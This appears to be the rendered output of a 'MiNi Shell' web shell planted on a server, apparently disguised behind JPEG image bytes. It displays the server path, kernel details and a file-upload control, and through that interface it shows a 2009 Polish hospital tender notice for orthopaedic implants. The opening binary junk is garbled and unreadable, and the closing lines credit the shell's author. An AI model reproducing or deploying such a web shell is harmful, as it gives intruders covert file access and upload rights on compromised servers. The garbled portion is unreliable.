JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090106/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090106/4811-N-2009.html

<p class="kh_header"><b>Lubin: Dostawa wyrobów medycznych tj. implantów wraz z dzierżawą instrumentarium</b><br>
<b>Numer ogłoszenia: 4811 - 2009; data zamieszczenia: 06.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Opieki Zdrowotnej w Lubinie , ul. Bema 6, 59-300 Lubin, woj. dolnośląskie, tel. 076 8401715, faks 076 8401716.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zozlubin.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b>  Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa wyrobów medycznych tj. implantów wraz z dzierżawą instrumentarium.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa wyrobów medycznych - implantów ( tj. wkrętów, gwoździ, płytek, śrub ) wraz z dzierżawą instrumentarium..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.18.31.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie wymagane<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.O udzielenie zamówienia publicznego mogą  ubiegać się Wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 pkt.1 - 4 ustawy Pzp, tj.: 
a)posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień i w celu potwierdzenia przedstawią Zamawiającemu: 
-aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż  6 miesięcy przed upływem terminu składania ofert.
b)posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia. W celu potwierdzenia przedstawią  Zamawiającemu :
-oświadczenie zgodnie z treścią Załącznika Nr 2 do oferty.
c)znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia tj. przedstawią oświadczenie, że są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej, zgodnie z treścią Załącznika Nr 5 do oferty.  
d)nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego i w tym celu przedstawią  Zamawiającemu :
-oświadczenie  zgodnie z treścią Załącznika Nr 1 do oferty oraz złożą wymagane w pkt. 6 siwz oświadczenia i dokumenty 

Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w postępowaniu na podstawie załączonych do oferty dokumentów i oświadczeń  zgodnie z formułą  spełnia / nie spełnia.

2. Zasady oceny spełnienia warunków w przypadku złożenia oferty wspólnej.
a)Warunki opisane w pkt. 1a i 1d  winien spełnić każdy z podmiotów osobno.
b)Warunki opisane w pkt. 1b i 1c mogą spełniać Wykonawcy występujący wspólnie.
3. Oferty składane przez Wykonawców występujących wspólnie.
a)Wykonawcy występujący wspólnie ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
b)Przepisy dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców występujących wspólnie.
c)Wykonawcy występujący wspólnie, ponoszą solidarną odpowiedzialność za wykonanie umowy.
d)Jeżeli oferta Wykonawców występujących wspólnie zostanie wybrana, Zamawiający zażąda przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę i odpowiedzialność tych Wykonawców.
4. Dokumentowanie spełnienia warunków przez Wykonawcę mającego siedzibę lub miejsce zamieszkania poza terytorium RP.
a)Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium RP zamiast dokumentów, o których mowa w pkt. 1a i 1d, składa odpowiedni dokument lub dokumenty, wystawione zgodnie z prawem kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani ogłoszono upadłości, nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, nie orzeczono wobec niego zakazu ubiegania się o zamówienie.
b)Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. 
4a.  zastępuje się je dokumentem zawierającym oświadczenie złożone  przed notariuszem, właściwym organem sądowym,  administracyjnym albo organem  samorządu zawodowego lub  gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
5.Dokumenty wymagane przez Zamawiającego i dołączone do Formularza oferty mogą być
a)przedstawione w formie oryginału,
b)przedstawione w formie kopii potwierdzonej Za zgodność z oryginałem przez uprawnione osoby. Zamawiający zaleca aby ofertę podpisano zgodnie z zasadami reprezentacji wskazanymi we właściwym rejestrze lub ewidencji działalności gospodarczej. Jeżeli osoba / osoby podpisująca ofertę działa na podstawie pełnomocnictwa, to pełnomocnictwo to musi w swej treści jednoznacznie wskazywać uprawnienie do podpisania oferty. Pełnomocnictwo to musi zostać dołączone do oferty i musi być złożone w oryginale lub kopii poświadczonej za zgodność z oryginałem przez notariusza..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Wraz z ofertą wypełnioną na Formularzu oferty należy załączyć :
a)oświadczenie Wykonawcy, że nie podlega wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy - Załącznik Nr 1 do oferty,
b)oświadczenie Wykonawcy o spełnieniu warunków określonych w art. 22 ust. 1 pkt. 1-3 ustawy - Załącznik Nr 2 do oferty.
c)wypełniony Formularz cenowy - Załącznik Nr 3 do oferty ( specyfikacja ilościowo - asortymentowa ),
d)aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej.
e)wykaz instrumentarium -  Załącznik Nr 4 do oferty -  tylko w przypadku oferty składanej na Zadanie Nr 4 lub 5.  
f)oświadczenie, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej - Załącznik Nr 5 do oferty
g)pełnomocnictwo wystawione dla osoby podpisującej ofertę - tylko w przypadku podpisania jej przez  osobę nie uprawnioną do reprezentacji wprost z postanowień KRS lub ewidencji działalności gospodarczej.
h)dokument ustanawiający pełnomocnika i upoważniający go do podpisywania oferty oraz  reprezentowania podmiotów występujących wspólnie - tylko w  przypadku złożenia oferty wspólnej. Przyjmuje się, że pełnomocnictwo do podpisania oferty obejmuje również  pełnomocnictwo do poświadczenia za zgodność z oryginałem wszystkich kopii.
2. W celu potwierdzenia, że oferowany przedmiot zamówienia spełnia wymagania 
określone przez Zamawiającego, Wykonawca zobowiązany jest przedłożyć w ofercie :
a)oświadczenie o dopuszczeniu przedmiotu zamówienia do stosowania i obrotu, zgodne z ustawą o wyrobach medycznych z dnia 20 kwietnia 2004r  Dz. U.  Nr  93 poz. 896 - Załącznik Nr 5 do oferty.
b)dla każdej oferowanej pozycji stronę katalogową lub inny dokument, który potwierdzi wymagany przez Zamawiającego opis. Na  stronach tych należy zaznaczyć numer zadania i pozycję  oferowanego wyrobu.
Zamawiający zastrzega sobie ponadto możliwość żądania próbek  wraz z wymaganymi instrumentariami oraz opisem  technik operacyjnych..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zozlubin.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Opieki Zdrowotnej, 59-300 Lubin, ul. Bema 6, Dział Zamówień Publicznych, pok. 205.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.01.2009 godzina 10:00, miejsce: Zespół Opieki Zdrowotnej, 59-300 Lubin, ul. Bema 6, Kancelaria, pok. 201.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Implanty.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wkręt kostny kaniulowany samogwintujący, niesterylny, różne rozmiary - 10 pozycji.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.31.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Implanty.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Plytki kostne proste, niesterylne - 17 pozycji, Płytki szerokie blokowane, grube - 7 pozycji, Płytki wąskie, kompresyjne, blokowane z ograniczonym kontaktem, cienkie - 5 pozycji, Płytki wąskie, kompresyjne, blokowane cienkie - 5 pozycji.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.31.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Implanty.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Płytki kostne kształtowe, niesterylne - 48 pozycji, Płytki samodociskowe do zespoleń nasady kości ramieniowej - 5 pozycji, Płytki do zespoleń nasady kości ramieniowej - 5 pozycji, Płytki samodociskowe do zespoleń nasady górnej kości piszczelowej - 5 pozycji, Płytki do zespoleń nasady głównej kości piszczelowej - 5 pozycji, Płytki samodociskowe Y do zespoleń nasady dalszej kości ramieniowej - 11 pozycji, Płytki Y do wieloodłamowych złamań kłykci - 4 pozycje, Płytki piszczelowe T - 8 pozycji, Płytki piszczelowe L - 5 pozycji wg listy ilościowo - asortymentowej.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.31.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Implanty.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> System pozycji implantów do zespoleń przykostnych w obrębie kości długich wraz z dzierżawą instrumentarium - 11 pozycji wg listy ilościowo - asortymentowej.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.31.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Implanty.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Implanty do zespoleń śródszpikowych - gwoździe śródszpikowe wraz z dzierżawą instrumentarium - Gwoździe śródszpikowe do stabilizacji złamań bliższej nasady kości udowej - 1 pozycja, Gwoździe śródszpikowe do stabilizacji złamań trzonów kości udowej - 1 pozycja, Gwoździe śródszpikowe do stabilizacji złamań bliższej nasady kości ramiennej - 1 pozycja, Gwoździe śródszpikowe do stabilizacji złamań trzonu kości ramiennej - 1 pozycja, woździe śródszpikowe do stabilizacji złamań dalszej nasady kośći udowej, wprowadzane odkolanowo - 1 pozycja.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.31.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com